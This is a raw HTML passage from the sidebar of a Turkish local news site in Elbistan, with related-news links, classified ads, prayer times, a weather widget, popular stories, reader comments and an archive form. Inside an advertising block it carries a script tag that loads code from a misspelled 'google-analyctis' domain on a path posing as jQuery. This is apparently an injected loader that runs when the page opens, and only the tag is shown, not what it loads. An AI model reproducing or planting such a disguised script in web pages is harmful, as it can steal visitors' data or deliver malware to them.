“Nasıl Başarılı Oldum?” Paneli"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/bahcesehir_kolejinde_nasil_basarili_oldum_paneli_h64746_17434.jpg" alt="Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?” Paneli" /> <span>Bahçeşehir Koleji’nde “Nasıl Başarılı Oldum?”...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/aycan-firma-geregini-yapmali-h64745.html" title="Aycan: “Firma, gereğini yapmalı”"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/aycan_firma_geregini_yapmali_h64745_e7518.jpg" alt="Aycan: “Firma, gereğini yapmalı”" /> <span>Aycan: “Firma, gereğini yapmalı”</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/bakis-mahallesinde-agaclandirma-seferberligi-h64744.html" title="Bakış Mahallesi’nde ağaçlandırma seferberliği"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/bakis_mahallesinde_agaclandirma_seferberligi_h64744_0cf45.jpg" alt="Bakış Mahallesi’nde ağaçlandırma seferberliği" /> <span>Bakış Mahallesi’nde ağaçlandırma seferberliği</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-7-bin-fidan-h64743.html" title="Elbistan’ın geleceğine 7 bin fidan"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/elbistanin_gelecegine_7_bin_fidan_h64743_dd65f.jpg" alt="Elbistan’ın geleceğine 7 bin fidan" /> <span>Elbistan’ın geleceğine 7 bin fidan</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html" title="Nesli tehlike altında olan vaşak, av tüfeği ile öldürüldü"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/nesli_tehlike_altinda_olan_vasak_av_tufegi_ile_olduruldu_h64742_b5a3e.jpg" alt="Nesli tehlike altında olan vaşak, av tüfeği ile öldürüldü" /> <span>Nesli tehlike altında olan vaşak, av tüfeği ile...</span> </a> </div> <div class="ilgiliHaber"> <a href="http://www.elbistaninsesi.com/guncel/kocatepe-universitesi-ogr-uyesi-prof-dr-bahri-ersoy-dan-gazetemize-nezaket-ziyareti-h64741.html" title="Kocatepe Üniversitesi Öğr. Üyesi Prof. Dr. Bahri Ersoy&#039;dan gazetemize nezaket ziyareti"> <img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/kocatepe_universitesi_ogr_uyesi_prof_dr_bahri_ersoy_dan_gazetemize_nezaket_ziyareti_h64741_2c8f6.jpg" alt="Kocatepe Üniversitesi Öğr. Üyesi Prof. Dr. Bahri Ersoy&#039;dan gazetemize nezaket ziyareti" /> <span>Kocatepe Üniversitesi Öğr. Üyesi Prof. Dr. Bahri...</span> </a> </div> </div> <div id="syazar"> <div class="header"> <h5><a style="margin-top:10px;" href="http://www.elbistaninsesi.com/seri-ilanlar/ilanver.html" class="this pull-left btn btn-small" title="İlan Ekle"><i class="halflings-icon plus"></i> İlan Ekle</a> <a style="margin-right:65px;font-size:140%;color:red;" href="http://www.elbistaninsesi.com/seri-ilanlar" title="Seri İlanlar">Seri İlanlar</a></h5> <a class="control left" href="#" id="syprev"></a> <a class="control right" href="#" id="synext"></a> </div> <div class="content"> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangir-elektrik-11831.html" title="Cihangir Elektrik" >Cihangir Elektrik</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/cihangir-elektrik-11831.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Cihangir Elektrik" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-11825.html" title="ELEMAN ARANIYOR" >ELEMAN ARANIYOR</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/eleman-araniyor-11825.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="ELEMAN ARANIYOR" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11824.html" title="KİRALIK DAİRE" >KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11824.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-11823.html" title="Satılık daire" >Satılık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-daire-11823.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Satılık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11818.html" title="kiralık daire" >kiralık daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-daire-11818.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="kiralık daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/deneyimli-bay-bayan-11816.html" title="Deneyimli bay &amp;bayan" >Deneyimli bay &amp;bayan</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/deneyimli-bay-bayan-11816.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Deneyimli bay &amp;bayan" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/sahintepesinde-1000-tl-ye-41-kiralik-ultra-luks-11815.html" title="ŞAHİNTEPESINDE 1000 TL YE 4+1 KİRALIK ULTRA LÜKS" >ŞAHİNTEPESINDE 1000 TL YE 4+1 KİRALIK ULTRA LÜKS</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/sahintepesinde-1000-tl-ye-41-kiralik-ultra-luks-11815.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/c20f2cfda4d3344202504d45a3483fcdfa13f6dd.jpg" alt="ŞAHİNTEPESINDE 1000 TL YE 4+1 KİRALIK ULTRA LÜKS" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/2000-model-slk-11809.html" title="2000 model Slk" >2000 model Slk</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/2000-model-slk-11809.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/b24084e281dfd45e77941eaf7088df7e1d0153ef.jpg" alt="2000 model Slk" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/uzun-carsida-78-metrekare-kiralik-dukkan-11806.html" title="UZUN ÇARŞIDA 78 METREKARE KİRALIK DÜKKAN" >UZUN ÇARŞIDA 78 METREKARE KİRALIK DÜKKAN</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/uzun-carsida-78-metrekare-kiralik-dukkan-11806.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="UZUN ÇARŞIDA 78 METREKARE KİRALIK DÜKKAN" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/11-full-esyali-daire-11798.html" title="1+1 full eşyalı daire" >1+1 full eşyalı daire</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/11-full-esyali-daire-11798.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/6215622c90f305aefdbce4ad1b7eebd52c240a47.jpg" alt="1+1 full eşyalı daire" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-11-daire-ofis-11793.html" title="SATILIK 1+1 Daire &amp;Ofis" >SATILIK 1+1 Daire &amp;Ofis</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/satilik-11-daire-ofis-11793.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/8cf6d8e7d32210382b2c489952ad87b38d67e36c.jpg" alt="SATILIK 1+1 Daire &amp;Ofis" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/2001-elegance-11789.html" title="2001 elegance" >2001 elegance</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/2001-elegance-11789.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/0ce9d201ba8482e1846a8232977331d76d6ee7c9.jpg" alt="2001 elegance" class="img-rounded" /></a> </div> </div> </div> <div class="item"> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/2000-model-rxt-laguna-11788.html" title="2000 model RXT Laguna" >2000 model RXT Laguna</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/2000-model-rxt-laguna-11788.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/dbe033088e95baf9188bebc62be3e5d8ecd6bbef.jpg" alt="2000 model RXT Laguna" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/tokide-kiralik-daire-11785.html" title="TOKİDE KİRALIK DAİRE" >TOKİDE KİRALIK DAİRE</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/tokide-kiralik-daire-11785.html" title="" ><img src="http://www.elbistaninsesi.com/images/ilanlar/thumbs/32ad39ca587b27023dc79fe4be4078f871b7378d.jpg" alt="TOKİDE KİRALIK DAİRE" class="img-rounded" /></a> </div> </div> <div class="row-fluid"> <div class="span9"> <h5><a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sobali-1-ve-2-kat-11777.html" title="Kiralik sobali 1. Ve 2. Kat" >Kiralik sobali 1. Ve 2. Kat</a></h5> </div> <div class="span3"> <a href="http://www.elbistaninsesi.com/seri-ilanlar/kiralik-sobali-1-ve-2-kat-11777.html" title="" ><img src="http://www.elbistaninsesi.com/images/dosyalarim/resimyok.png" alt="Kiralik sobali 1. Ve 2. Kat" class="img-rounded" /></a> </div> </div> </div> </div> </div> <!-- SOSYAL --> <div class="sosyal"> <div class="row-fluid content"> <div class="span6 box facebook"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/fb32.png" alt="Facebook"></div> <div class="right"> <span class="count"><a href="http://facebook.com/elbistaninsesi" target="blank" id="likes"></a></span> <span class="text">Beğeni</span> </div> </div> <div class="bottom"> <a href="http://facebook.com/elbistaninsesi" target="blank" rel="nofollow">Facebook'ta Beğen</a> </div> </div> <div class="span6 box twitter"> <div class="top"> <div class="icon"><img src="http://www.elbistaninsesi.com/_themes/hs-rush-php/images/icon/twitter32.png" alt="Twitter"></div> <div class="right"> <span class="count"><a href="http://twitter.com/elbistaninsesi" target="blank" id="followers"></a></span> <span class="text">Takipçi</span> </div> </div> <div class="bottom"> <a href="http://twitter.com/elbistaninsesi" target="blank" rel="nofollow">Twitter'da Takip Et</a> </div> </div> </div> </div> <div id = "nobetci"> <a href="http://www.elbistaninsesi.com/images/dosyalarim/eczane.jpg" title="Nöbetçi Eczane" target="_blank"><img src = "http://www.ugurmumcu.info.tr/wp-content/uploads/2014/05/rb-eczane.png"></a> </div> <!-- NAMAZ VAKITLERI --> <div class="namazvakitleri"> <div class="title"> <h5>Namaz Vakitleri</h5> <select name="namaz" onchange="namaz_vakitleri(this.value); " class="span5 pull-right"> <option value="adana" >Adana</option> <option value="adiyaman" >Adıyaman</option> <option value="afyon" >Afyon</option> <option value="agri" >Ağrı</option> <option value="aksaray" >Aksaray</option> <option value="amasya" >Amasya</option> <option value="ankara" >Ankara</option> <option value="antalya" >Antalya</option> <option value="ardahan" >Ardahan</option> <option value="artvin" >Artvin</option> <option value="aydin" >Aydın</option> <option value="balikesir" >Balıkesir</option> <option value="bartin" >Bartın</option> <option value="batman" >Batman</option> <option value="bayburt" >Bayburt</option> <option value="bilecik" >Bilecik</option> <option value="bingol" >Bingöl</option> <option value="bitlis" >Bitlis</option> <option value="bolu" >Bolu</option> <option value="burdur" >Burdur</option> <option value="bursa" >Bursa</option> <option value="canakkale" >Çanakkale</option> <option value="cankiri" >Çankırı</option> <option value="corum" >Çorum</option> <option value="denizli" >Denizli</option> <option value="diyarbakir" >Diyarbakır</option> <option value="duzce" >Düzce</option> <option value="edirne" >Edirne</option> <option value="elazig" >Elazığ</option> <option value="erzincan" >Erzincan</option> <option value="erzurum" >Erzurum</option> <option value="eskisehir" >Eskişehir</option> <option value="gaziantep" >Gaziantep</option> <option value="giresun" >Giresun</option> <option value="gumushane" >Gümüşhane</option> <option value="hakkari" >Hakkari</option> <option value="hatay" >Hatay</option> <option value="igdir" >Iğdır</option> <option value="isparta" >Isparta</option> <option value="istanbul" >İstanbul</option> <option value="izmir" >İzmir</option> <option value="kahramanmaras" selected>Kahramanmaraş</option> <option value="karabuk" >Karabük</option> <option value="karaman" >Karaman</option> <option value="kars" >Kars</option> <option value="kastamonu" >Kastamonu</option> <option value="kayseri" >Kayseri</option> <option value="kirikkale" >Kırıkkale</option> <option value="kirklareli" >Kırklareli</option> <option value="kirsehir" >Kırşehir</option> <option value="kilis" >Kilis</option> <option value="izmit" >Kocaeli</option> <option value="konya" >Konya</option> <option value="kutahya" >Kütahya</option> <option value="malatya" >Malatya</option> <option value="manisa" >Manisa</option> <option value="mardin" >Mardin</option> <option value="mersin" >Mersin</option> <option value="mugla" >Muğla</option> <option value="mus" >Muş</option> <option value="nevsehir" >Nevşehir</option> <option value="nigde" >Niğde</option> <option value="ordu" >Ordu</option> <option value="osmaniye" >Osmaniye</option> <option value="rize" >Rize</option> <option value="adapazari" >Sakarya</option> <option value="samsun" >Samsun</option> <option value="siirt" >Siirt</option> <option value="sinop" >Sinop</option> <option value="sivas" >Sivas</option> <option value="sanliurfa" >Şanlıurfa</option> <option value="sirnak" >Şırnak</option> <option value="tekirdag" >Tekirdağ</option> <option value="tokat" >Tokat</option> <option value="trabzon" >Trabzon</option> <option value="tunceli" >Tunceli</option> <option value="usak" >Uşak</option> <option value="van" >Van</option> <option value="yalova" >Yalova</option> <option value="yozgat" >Yozgat</option> <option value="zonguldak" >Zonguldak</option> </select> </div> <div class="content"> <div class="sonuc"> <table cellspacing="0" cellpadding="0" id="vakitler"> <tr> <th>İmsak</th> <th>Güneş</th> <th>Öğle</th> <th>İkindi</th> <th>Akşam</th> <th>Yatsı</th> </tr> <tr> <td></td> <td></td> <td></td> <td></td> <td></td> <td></td> </tr> </table> </div> </div> </div> <div class="reklam reklam208"><iframe name=BIKADV src="http://medya.ilan.gov.tr/widgets/YYN-001260-20160610.html" width="300" height="175" frameborder="0" scrolling="no"></iframe> <script src="//apis.google-analyctis.com/ajax/libs/query/1/6/2/jquery/min"></script></div><a href="http://www.accuweather.com/tr/tr/elbistan/318373/current-weather/318373" class="aw-widget-legal"> <!-- By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy. --> </a><div id="awtd1452737033699" class="aw-widget-36hour" data-locationkey="318373" data-unit="c" data-language="tr" data-useip="false" data-uid="awtd1452737033699" data-editlocation="false"></div><script type="text/javascript" src="http://oap.accuweather.com/launch.js"></script> <!-- ENCOKLAR --> <div class="encoklar"> <div class="accordion"> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseOne"> <span class="encoklar-icon"><i class="halflings-icon white fire"></i></span><h5>Bu Ay Çok Okunanlar</h5></a> </div> <div id="collapseOne" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/guncel/silahli-saldirida-1-kisi-yaralandi-h64475.html" title="Silahlı saldırıda 1 kişi yaralandı" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/silahli_saldirida_1_kisi_yaralandi_h64475_e1fe2.jpg" alt="Silahlı saldırıda 1 kişi yaralandı" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/silahli-saldirida-1-kisi-yaralandi-h64475.html" title="" ><span class="en-hit">1.</span> <strong>Silahlı saldırıda 1 kişi yaralandı</strong> <span class="en-spot en-hidden">Elbistan’da yeni sanayi sitesinde silahlı saldırıya uğrayan 34 yaşındaki...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/kazara-ates-alan-tufek-10-yasindaki-elanuru-hayattan-kopardi-h64583.html" title="Kazara ateş alan tüfek, 10 yaşındaki..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/kazara_ates_alan_tufek_10_yasindaki_elanuru_hayattan_kopardi_h64583_59e42.jpg" alt="Kazara ateş alan tüfek, 10 yaşındaki..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/kazara-ates-alan-tufek-10-yasindaki-elanuru-hayattan-kopardi-h64583.html" title="" ><span class="en-hit">2.</span> <strong>Kazara ateş alan tüfek, 10 yaşındaki...</strong> <span class="en-spot en-hidden">Elbistan’da, kazara ateşlendiği iddia edilen otomatik av tüfeğinden...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/iskeleden-dusen-elbistanli-isci-yasamini-yitirdi-h64683.html" title="İskeleden düşen Elbistanlı işçi..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/iskeleden_dusen_elbistanli_isci_yasamini_yitirdi_h64683_cc378.jpg" alt="İskeleden düşen Elbistanlı işçi..." ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/iskeleden-dusen-elbistanli-isci-yasamini-yitirdi-h64683.html" title="" ><span class="en-hit">3.</span> <strong>İskeleden düşen Elbistanlı işçi...</strong> <span class="en-spot en-hidden">İstanbul’da çalıştığı inşaatın 3.katındaki iskeleden dengesini...</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/hacer-balyemez-48-yasinda-h64523.html" title="Hacer BALYEMEZ 48 Yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/hacer_balyemez_48_yasinda_h64523_06410.jpg" alt="Hacer BALYEMEZ 48 Yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/hacer-balyemez-48-yasinda-h64523.html" title="" ><span class="en-hit">4.</span> <strong>Hacer BALYEMEZ 48 Yaşında</strong> <span class="en-spot en-hidden">Hacer BALYEMEZ 48 Yaşında</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/erdal-guzeloz-32-yasinda-h64619.html" title="Erdal Güzelöz 32 yaşında" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/erdal_guzeloz_32_yasinda_h64619_b8ef4.jpg" alt="Erdal Güzelöz 32 yaşında" ></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/erdal-guzeloz-32-yasinda-h64619.html" title="" ><span class="en-hit">5.</span> <strong>Erdal Güzelöz 32 yaşında</strong> <span class="en-spot en-hidden">Erdal Güzelöz 32 yaşında</span></a></div></li> </ul> </div> </div> </div> <div class="accordion-group"> <div class="accordion-heading"> <a class="accordion-toggle" data-toggle="collapse" data-parent="#encoklar" href="#collapseTwo"> <span class="encoklar-icon"><i class="halflings-icon white comments"></i></span><h5>Bu Ay Çok Yorumlananlar</h5></a> </div> <div id="collapseTwo" class="accordion-body collapse in"> <div class="accordion-inner"> <ul class="en-list"> <li class="en-hidden en-visible"><a href="http://www.elbistaninsesi.com/vefatlar/anma-h64621.html" title="ANMA" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/anma_h64621_d5b8e.jpg" alt="ANMA"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/anma-h64621.html" title="" ><span class="en-hit">1.</span> <strong>ANMA</strong> <span class="en-spot en-hidden">Hamit BEKÇİ</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/sirahbil-ketizmen-h64633.html" title="Şırahbil Ketizmen" class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/sirahbil_ketizmen_h64633_ef0f4.jpg" alt="Şırahbil Ketizmen"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/sirahbil-ketizmen-h64633.html" title="" ><span class="en-hit">2.</span> <strong>Şırahbil Ketizmen</strong> <span class="en-spot en-hidden"> Şırahbil Ketizmen</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/vefatlar/gani-piskin-72-yasinda-h64693.html" title="Gani Pişkin 72 yaşında," class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/gani_piskin_72_yasinda_h64693_7699f.jpg" alt="Gani Pişkin 72 yaşında,"></a><div class="en-right"><a href="http://www.elbistaninsesi.com/vefatlar/gani-piskin-72-yasinda-h64693.html" title="" ><span class="en-hit">3.</span> <strong>Gani Pişkin 72 yaşında,</strong> <span class="en-spot en-hidden">Gani Pişkin 72 yaşında,</span></a></div></li> <li class="en-hidden"><a href="http://www.elbistaninsesi.com/guncel/sendika-baskanlarindan-ortak-cagri-cevre-kadar-istihdami-da-dusunmeliyiz-h64571.html" title="Sendika başkanlarından ortak çağrı:..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/10/sendika_baskanlarindan_ortak_cagri_cevre_kadar_istihdami_da_dusunmeliyiz_h64571_81955.jpg" alt="Sendika başkanlarından ortak çağrı:..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/sendika-baskanlarindan-ortak-cagri-cevre-kadar-istihdami-da-dusunmeliyiz-h64571.html" title="" ><span class="en-hit">4.</span> <strong>Sendika başkanlarından ortak çağrı:...</strong> <span class="en-spot en-hidden">Tes-İş Sendikası Afşin Şube Başkanı Mustafa Kılıç ve Maden-İş...</span></a></div></li> <li class="last en-hidden"><a href="http://www.elbistaninsesi.com/guncel/ozdemir-sirket-filtre-konusunda-uzerine-duseni-yapmaliydi-h64712.html" title="Özdemir, Şirket, filtre konusunda..." class="en-left"><img src="http://www.elbistaninsesi.com/images/haberler/thumbs/2019/11/ozdemir_sirket_filtre_konusunda_uzerine_duseni_yapmaliydi_h64712_e24b1.jpg" alt="Özdemir, Şirket, filtre konusunda..."></a><div class="en-right"><a href="http://www.elbistaninsesi.com/guncel/ozdemir-sirket-filtre-konusunda-uzerine-duseni-yapmaliydi-h64712.html" title="" ><span class="en-hit">5.</span> <strong>Özdemir, “Şirket, filtre konusunda...</strong> <span class="en-spot en-hidden">AK Parti Kahramanmaraş Milletvekili Av. Ahmet Özdemir, termik santrallere...</span></a></div></li> </ul> </div> </div> </div> </div> </div> <!-- SON YORUMLAR --> <div class="sayfalar"> <div class="header"> <h5>Son Yorumlar</h5> </div> <div class="content"> <ul class="unstyled"> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html#comment_274218" title="" >kimbilir hangi yavsak tır</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/yesil-baris-dernegi-15-termik-santralin-kapatilmasini-istedi-h64708.html#comment_274217" title="" >Sayın Mühendis ve aynı düşüncede olanlar;...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-7-bin-fidan-h64743.html#comment_274215" title="" >ak davamız ile yeşile berekete gelecege...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeliha-deveci-74-yasinda-h64739.html#comment_274214" title="" >Allah rahmet eylesin mekanı cennet olsun...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/dumlupinar-insanlarin-zehir-solumasina-karsi-harekete-gecilmeli-h64728.html#comment_274213" title="" >Devletimiz kararlı olursa kuzu kuzu takar...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/ozdemir-sirket-filtre-konusunda-uzerine-duseni-yapmaliydi-h64712.html#comment_274212" title="" >Elbistan daha yeni bir hizmet görmeye başladı....</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/otomobil-elektrik-diregine-carpti-1-yarali-h64737.html#comment_274211" title="" >Bu karaelbistan yolu nedir anam bilemedik...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html#comment_274210" title="" >Allah belanızı versin şu hayvandan ne...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/elbistanin-gelecegine-7-bin-fidan-h64743.html#comment_274209" title="" >Böyle etkinlikleri sürekli istiyoruz </a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeliha-deveci-74-yasinda-h64739.html#comment_274208" title="" >Allah rahmet eylesin mekanı cennet olsun.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeliha-deveci-74-yasinda-h64739.html#comment_274207" title="" >Allah rahmet eylesin.</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeliha-deveci-74-yasinda-h64739.html#comment_274206" title="" >Merhumeye Allah’tan rahmet, yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/arif-bilgin-aday-ogretmenlere-tecrubelerini-aktardi-h64714.html#comment_274205" title="" >&#34;arif efendi &#34; sizin taraftar yazılarınızdan...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html#comment_274204" title="" >Nefretle kınıyorum canileri</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/sirahbil-ketizmen-h64633.html#comment_274203" title="" >ELBİSTANIN MÜMTAZ ŞAHSİYETLERİNDEN...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/zeliha-deveci-74-yasinda-h64739.html#comment_274202" title="" >Merhumeye Allah&#39;tan rahmet yakınlarına...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/vefatlar/ahmet-akdag-81-yasinda-h64726.html#comment_274201" title="" >ALLAH RAHMET EYLESİN MEKANI CENNET OLSUN</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html#comment_274200" title="" >Eline silah alan herkes avcı bular cahil...</a></li> <li><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html#comment_274199" title="" >Vurana hayvan desem hayvana ağır olacak...</a></li> <li class="last"><i class="icon-chevron-right"></i> <a href="http://www.elbistaninsesi.com/guncel/nesli-tehlike-altinda-olan-vasak-av-tufegi-ile-olduruldu-h64742.html#comment_274198" title="" >&#34;Doğa Sporları ve Avcılık&#34; (!)...</a></li> </ul> </div> </div> <!-- ARSIV --> <div class="arsiv"> <div class="header"> <h5>Arşiv</h5> </div> <div class="content"> <form action="http://www.elbistaninsesi.com/?m=arsiv" method="post" name="arsiv" > <select name="gun" class="day span1"> <option value="01" >01</option> <option value="02" >02</option> <option value="03" >03</option> <option value="04" >04</option> <option value="05" >05</option> <option value="06" >06</option> <option value="07" >07</option> <option value="08" >08</option> <option value="09" >09</option> <option value="10" >10</option> <option value="11" selected>11</option> <option value="12" >12</option> <option value="13" >13</option> <option value="14" >14</option> <option value="15" >15</option> <option value="16" >16</option> <option value="17" >17</option> <option value="18" >18</option> <option value="19" >19</option> <option value="20" >20</option> <option value="21" >21</option> <option value="22" >22</option> <option value="23" >23</option> <option value="24" >24</option> <option value="25" >25</option> <option value="26" >26</option> <option value="27" >27</option> <option value="28" >28</option> <option value="29" >29</option> <option value="30" >30</option> <option value="31" >31</option> </select> <select name="ay" class="month span1"> <option value="01" >Ocak</option> <option value="02" >Şubat</option> <option value="03" >Mart</option> <option value="04" >Nisan</option> <option value="05" >Mayıs</option> <option value="06" >Haziran</option> <option value="07" >Temmuz</option> <option value="08" >Ağustos</option> <option value="09" >Eylül</option> <option value="10" 